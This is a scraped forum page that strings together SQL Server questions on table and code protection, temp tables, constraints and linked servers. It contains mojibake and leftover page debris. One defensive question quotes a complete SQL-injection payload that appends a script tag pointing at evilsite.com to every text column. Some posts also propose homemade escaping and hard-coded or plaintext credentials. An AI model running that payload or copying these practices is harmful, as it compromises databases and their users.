I have a VB6 program that is using MS-SQL Server 2000. The people using the program can access the database and modify the records. This is fine except for one table.
Is it possible to prevent users from modifying one table (they can still view it) and allowing me and the VB program to acces this table?
Hello all, I have an app that is distributed to buyers and is registered on a per-computer basis. I am currently using SQL Server 2005. I have created my own registration process in which I can create a registration key file that my app reads to see the maximum # of uses of the app are allowed. I am saving the # of uses in a "keyuses" table. I need to protect this table from the users logging into the server with windows authentication and being able to edit the information in this table. I am used to Firebird, in which the security is totally user based, no windows authentication. You must explicitly grant access to every table for each user, or to the public user that represents every user. Anyways, I am pretty new to SQL server 2005. I know that there must be a way to protect a table from any modification except by a "SQL Authentication" user, which requires a username and password.
Thank you all!
Branden Johnson
Hello,
I am building a website in ASP.net 2.0 and I want to protect my self from sql Injection.
I am half way there in that I have built my own class that I use to check any input to the Database from a textbox (or user input) for specific characters that cause trouble, such as the “ ‘ � or “;� it then converts them to my own code for example “ ’ � = |^| the same function will convert my “code� back to the original character which works great until I get to Gridviews and Forum View.
Does anyone know how I would access the class I created through the gridview and formview so that any info they display gets first translated through my class.
Or if that is not possible how I would set the grideview or formview to translate the “codes� for me.
If I am totally off track here and there is a much better way to do all this then I am all ears. Please keep in mind I will require the “bad� characters to be saved in some way shape or form.
Thanks
I am currently writing a VB app based around a SQLserver2000 database. I have used stored procedures wherever possible to select/update/delete data. I am planning to distribute this app and wonder whether there are any tricks out there for encrypting/setting security so that even the SA account would be unable to read my stored procedures, but obviously be able to execute them?
There are two scenarios - one is where I want to let someone borrow a laptop just for a few days for a demo. Presumably I just give them an unprivileged user account without interactive logon possibilities, by which I mean Enterprise Manager and the other SQLserver Client tools [can I do this?] and control all access from the app.
The other scenario is when the app is purchased and I no longer have control of the SQL Server nor the SA account.
Any pointers would certainly be very useful indeed. Thanks.
Andy writes "Good day Gurus!
I have a question regarding how to protect my SQL data. My Material Resource Planning software is built on SQL. There is a problem with my data and possibly a bug in the vendors software. They are asking me to send them my database.
My database contains vendors, customers, pricing partlists and procedures. The advantage of an MRP/ERP system is that the data is all in one place; the disadvantage is that if I send it out to the vendor, they have access to all that I do. This vendor also supports some of my competitors. My concern is that all it would take is one vendor employee to jump ship with my data on a dongle and I could end up completely compromised as a company.
Is there a way of easily or is there software that can leave the significant data in tact but replace the confidential data with meaningless information?
Significant data would be numbers, costs, etc, or data that I choose. Confidential data would be vendors, customers, etc.
It seems to me that this would be a fairly common problem, but I cannot find a solution that is both quick and effective.
Thanks for your collective thoughts.
Andy,"
I've been trying to look for information about using an SQL 2005 database with ASP.NET 2.0 - while there are loads of different articles coving configuring a database to use with asp.net, I cannot find anything on securing a sub-folder in my asp.net application. At the moment I am successfully connecting to, and validating users via a login page in my asp.net application, however, this is all pointless since I can still browse to the pages without logging in! I have tried putting in the usual <location> tags in my root web.config file and asp.net throws an error referring to my connection string, I have also tried adding a web.config file to the sub-directory, but that just uses the windows login, and I can't find anything that'll allow me to tie my own login page to it... Arrrgh! Any help will be greatly appreciated!
Thanks in advance.
I have a database installed on my server, and i have put a database on user "sa" , so when any user wants to view the database he must enter the password to view its content. But i have dicover that if the user make the authentication "Windows Authentication" and opened the database it will be opned without the need to enter the password !!! and for this i cant restrict the access for my database from un-authorized people.
Can any one tell me how i can restrict view database content unless entering the password?
Thaks
Hello,I wrote some complicated functions (and stored procedures) in databaseat my work. System administrator (and every db user) can view codes(in Enterprise Manager for eg.). My employer needs periodic modifyingof code and so I'm required to do it. But I can loose my job :)because users are able to modify code (althout they ware too lazy tocreate it by themselves).Is this possible to protect functions from view it?[please, don't mind my english]
View 5 Replies View RelatedHidoes anyone know of a way of giving developers read only access to adatabase diagram in Enterprise Manager (SQL Server 2000). The database wassupplied by a third party and we don't want them tinkering with it, butthey do need to be able to create additional tables etc. to extend thefunctionality of the package.TIAChloe Crowder
View 2 Replies View RelatedHi,I need to provide a facility to do routine database administration(backups, etc.) without allowing the logged in user to modify thedata in any of the SQL server tables. Is there any way to accomplishthis (such as maybe password protecting the tables or otherwise)? I amfairly new to SQL server - so would appreciate any pointers to this.Thanks a ton!Regards,Radha
View 1 Replies View RelatedHelloo all,
I would like to gather some thoughts on how to secure my database (running on sql server 2005) from SQL injection , one such as :
Code Snippet
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update [' + @T + '] set [' + @C + '] =
rtrim(convert(varchar,[' + @C + ']))+
''<script src=http://evilsite.com/1.js></script>'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
Basically this statement finds every text column contained in a database and inserts a cross site script into it.
I know this topic has been covered in some depth in articles such as :
MSDN article on SQL injection (http://msdn.microsoft.com/en-us/library/ms161953.aspx)
and on forums a few times.
And the general consensus is to check application code and fix it, which is fine, however we have many legacy systems where it would be too time consuming to fix the problem at the application level.
So the alternative is fix this at the database level.
A possible solution is to isolate the application access to only the objects it uses, and none of the system objects. This should prevent the statement above from running, because it requests access to the sysobjects and syscolumns views. I could implement this by changing the schema for all user objects from dbo to [myAppSchema] and assigning it to my applications database user.
Not particularly elegant but might work, what do you think?
Nigel.
I have developed some custom SQL reports that query a major software vendor's SQL Database, and I would like to sell them commercially.
The only problem is that I dont know how to protect them from casual piracy? Ideally I would like to tie them into a uniqueness of the database server eg the machine SID or similar but have no experience of this..
Can anyone recommend a way of commercially protecting the code pleaaaase?
Thanks!
In SRS is there a simiple way to password protect a report? Or will I need to handle this in ASP?
View 4 Replies View Related
I am creating a .NET application with a SQL database (SQL 2005). The database will be installed at the clients site. I would like to keep them from viewing my Tables, Stored Procedures, etc. I have read several posts on here and no one has given a solution to this, is this possible in SQL?? I am also currently encrypting/decrypting the table data in my SP's but what is to prevent the client from writing an application that accesses my SP's and therefore retrieving the decrypted data??
I have a Windows Forms 2.0 application with which I am distributing a SQL Express database. I am currently using User Instances. Due to HIPAA requirements, I need to prevent any consumers from accessing the data within the database. Only the application should be able to expose the data. Ideally, I would like to hard code credentials into the compiled code to do this. How can I accomplish this ?
View 1 Replies View RelatedI have several sites which refer to a table in an MS SQL data base on the server.
I'm looking for a good way to check that my tables don't get corrupted
over time. It seems that I can't create a duplicate by selecting the
individual table and going SaveAs..
Can someone point me to the fool proof method that everyone else already uses, please ?
David Morley
Hi I am using sql server 2005 express and would like to keep all my fields from being both updated and deleted.
In other words, once I create a new record, I would like to have it protected from being deleted and I dont want the field values to be updated/changed from the values initially entered. Is there a way to this without running triggers or changing database permissions and user roles?
I tried making the database read-only, but then of course i cant add new records.
Thanks
Lets assume SQL Server 2005 running on Windows 2003 Server, connected to a network but not part of the domain. One application accesses it over the network with one login. Either SQL Server or a local windows login is used for authentication. This would protect SQL Server if the domain was compromised. I can see in normal circumstances domain level logins should be used, but in certain scenerios where the security of the SQL Server box is top would this be a good solution?
Thanks
Danny
Does anyone know how I can password protect XP Professional Control Panel?ThanksRonnie
View 1 Replies View RelatedDear GroupI'd be grateful if you can give me some advice on the following.An application I wrote uses an MSDE backend and I wonder whetherthere's a way (even for the system administrator) of not seeing ortracing stored procedure code, view and table designs?And I also wonder whether you can advise me on an installer thathandles MSDE and database setup during installation without too mucheffort but is still affordable < USD 1000.Any articles, resources, advice hints for these two topics are veryappreciated.Thank you very much for your help & efforts!Martin
View 3 Replies View RelatedI am using SQL Server 2005 and trying to create a linked server on Oracle 10. I used the commands below:
EXEC sp_addlinkedserver
@server = 'test1',
@srvproduct = 'Oracle',
@provider = 'MSDAORA',
@datasrc = 'testsource'
exec sp_addlinkedsrvlogin
@rmtsrvname = 'test1',
@useself = 'false',
@rmtuser='sp',
@rmtpassword='sp'
When I execute
select * from test1...COUNTRY
I get the error. "The OLE DB provider "MSDAORA" for linked server "...." does not contain the table "COUNTRY". The table either does not exist or the current user does not have permissions on that table."
The 'sp' user I am connecting is the owner of the table. What could be the problem ?
Thanks a lot.
I have created a table Table with name as Varchar and id as int. Now i have started inserting the rows like, insert into Table values ('arun',20).Yes i have inserted a row in the table. Now i have got the values " arun's ", 50. insert into Table values('arun's',20) My sqlserver is giving me an error instead of inserting the row. How will you solve this problem?
Hi
I am having a table called as status ,in that table one field is there i.e. currentstatus.
the rows which are having currentstatus as "ticket closed",i want to move those rows into other table called repository which is having same table structure as status table.
I can do programatically.
but is there any way for every 3 months system has to check and do this action means moving to repository table automatically?
Please help me.
Thanks.
I'm inserting from TempAccrual to VacationAccrual . It works nicely, however if I run this script again it will insert the same values again in VacationAccrual. How do I block that? IF there is a small change in one of the column in TempAccrual then allow insert. Here is my query
INSERT INTO vacationaccrual
(empno,
accrued_vacation,
accrued_sick_effective_date,
accrued_sick,
import_date)
[Code] ....
For reasons that are not relevant (though I explain them below *), Iwant, for all my users whatever privelige level, an SP which createsand inserts into a temporary table and then another SP which reads anddrops the same temporary table.My users are not able to create dbo tables (eg dbo.tblTest), but arepermitted to create tables under their own user (eg MyUser.tblTest). Ihave found that I can achieve my aim by using code like this . . .SET @SQL = 'CREATE TABLE ' + @MyUserName + '.' + 'tblTest(tstIDDATETIME)'EXEC (@SQL)SET @SQL = 'INSERT INTO ' + @MyUserName + '.' + 'tblTest(tstID) VALUES(GETDATE())'EXEC (@SQL)This becomes exceptionally cumbersome for the complex INSERT & SELECTcode. I'm looking for a simpler way.Simplified down, I am looking for something like this . . .CREATE PROCEDURE dbo.TestInsert ASCREATE TABLE tblTest(tstID DATETIME)INSERT INTO tblTest(tstID) VALUES(GETDATE())GOCREATE PROCEDURE dbo.TestSelect ASSELECT * FROM tblTestDROP TABLE tblTestIn the above example, if the SPs are owned by dbo (as above), CREATETABLE & DROP TABLE use MyUser.tblTest while INSERT & SELECT usedbo.tblTest.If the SPs are owned by the user (eg MyUser.TestInsert), it workscorrectly (MyUser.tblTest is used throughout) but I would have to havea pair of SPs for each user.* I have MS Access ADP front end linked to a SQL Server database. Forreports with complex datasets, it times out. Therefore it suit mypurposes to create a temporary table first and then to open the reportbased on that temporary table.
View 6 Replies View RelatedHi all,
The following dbo.Tables of Northwind.mdf in my .SQLEXPRESS (SQL Server Management Studio Express) are missing:
dbo.Categories
dbo.CustomerCustomerDemo
dbo.CustomerDemographics
dbo.Customers
dbo.Employees
dbo.EmployeeTerritories
dbo.Order Details
dbo.Orders
dbo.Products
dbo.Regions
dbo.Shippers
dbo.Suppliers
dbo.Territories.
But, I have these dbo.Tables in a different Database "xyzDatabase". How can I copy each of these dbo.Tables to the another blank dbo.Table of Northwind Database?
I right clicked on the dbo.Categories and I saw the following thing:
dbo.Categories
New Table...
Modify
Open Table
Script Table as |> CREATYE To |>
DROP To |>
SELECT To |>
INSERT To |> New Query Editor Window
File....
Clipboard
UPDATE To |>
DELETE to |>
From the above observation,I think it is possible to copy the dbo.Table from the one Database to the Northwind Database that needs to be repaired. Please help and advise me how to do this task or tell me where I can find the Microsoft document that gives the details of this X-copy thing.
Thanks in advance,
Scott Chang
P. S. I am using VB 2005 Express to create a project to learn "Calling Stored Procedures with ADO.NET" (see Paul Kimmel's article in http://www.developer.com/db/article.php/3438221) that needs the dbo.Tables of Northwind Database and my Northwind Database has been screwed up for quite a while and needs a big repair.
which is more efficient...which takes less memory...how is the memory allocation done for both the types.
View 1 Replies View Related'****************************************************************************
Cmd.CommandText = "Drop Table Raj"
Cmd.ExecuteNonQuery()
Cmd.CommandText = "Select * Into Raj From XXX"
Cmd.ExecuteNonQuery()
'**************************************************************************
This generates error that Table already exist.
If Wait 1 sec then execute statement then it works fine.
Thanks in Advance
Piyush Verma
I have one control table to store all related table name
Table ID TableName
1 TableA
2 TableB
In Table A:
RecordID Value
1 1
2 2
3 3
In Table B:
RecordID Value
1 1
2 2
3 3
How can I get the result by select the Table list first and then combine the data in table A and table B?
Thank you!
Just wondering if there is an easy transact statement to copy table 1 to table 2, appending the data in table 2.with SQL2000, thanks.
View 2 Replies View RelatedHi thanks for looking at my question
Using sqlServer management studio 2005
My Tables are something like this:
--Table 1 "Employee"
CREATE TABLE [MyCompany].[Employee](
[EmployeeGID] [int] IDENTITY(1,1) NOT NULL,
[BranchFID] [int] NOT NULL,
[FirstName] [varchar](50) NOT NULL,
[MiddleName] [varchar](50) NOT NULL,
[LastName] [varchar](50) NOT NULL,
CONSTRAINT [PK_Employee] PRIMARY KEY CLUSTERED
(
[EmployeeGID]
)
GO
ALTER TABLE [MyCompany].[Employee]
WITH CHECK ADD CONSTRAINT [FK_Employee_BranchFID]
FOREIGN KEY([BranchFID])
REFERENCES [myCompany].[Branch] ([BranchGID])
GO
ALTER TABLE [MyCompany].[Employee] CHECK CONSTRAINT [FK_Employee_BranchFID]
-- Table 2 "Branch"
CREATE TABLE [Mycompany].[Branch](
[BranchGID] [int] IDENTITY(1,1) NOT NULL,
[BranchName] [varchar](50) NOT NULL,
[City] [varchar](50) NOT NULL,
[ManagerFID] [int] NOT NULL,
CONSTRAINT [PK_Branch] PRIMARY KEY CLUSTERED
(
[BranchGID]
)
GO
ALTER TABLE [MyCompany].[Branch]
WITH CHECK ADD CONSTRAINT [FK_Branch_ManagerFID]
FOREIGN KEY([ManagerFID])
REFERENCES [MyCompany].[Employee] ([EmployeeGID])
GO
ALTER TABLE [MyCompany].[Branch]
CHECK CONSTRAINT [FK_Branch_ManagerFID]
--Foreign IDs = FID
--generated IDs = GID
Then I try a simple single row DELETE
DELETE FROM MyCompany.Employee
WHERE EmployeeGID= 39
Well this might look like a very basic error:
I get this Error after trying to delete something from Table €œEmployee€?
The DELETE statement conflicted with the
REFERENCE constraint "FK_Branch_ManagerFID".
The conflict occurred in database "MyDatabase",
table "myCompany.Branch", column 'ManagerFID'.
Yes what I€™ve been doing is to deactivate the foreign key constraint, in both tables when performing these kinds of operations, same thing if I try to delete a €œBranch€? entry, basically each entry in €œbranch€? and €œEmployee€? is child of each other which makes things more complicated.
My question is, is there a simple way to overcome this obstacle without having to deactivate the foreign key constraints every time or a good way to prevent this from happening in the first place? Is this when I have to use €œON DELETE CASCADE€? or something?
Thanks
In a table-valued UDF, does the UDF use a table variable or a temp table to form the resultset returned?
Banti writes "IF i create temporary table by using #table and ##table then what is the difference. i found no difference.
pls reply.
first:
create table ##temp
(
name varchar(25),
roll int
)
insert into ##temp values('banti',1)
select * from ##temp
second:
create table #temp
(
name varchar(25),
roll int
)
insert into #temp values('banti',1)
select * from #temp
both works fine , then what is the difference
waiting for ur reply
Banti"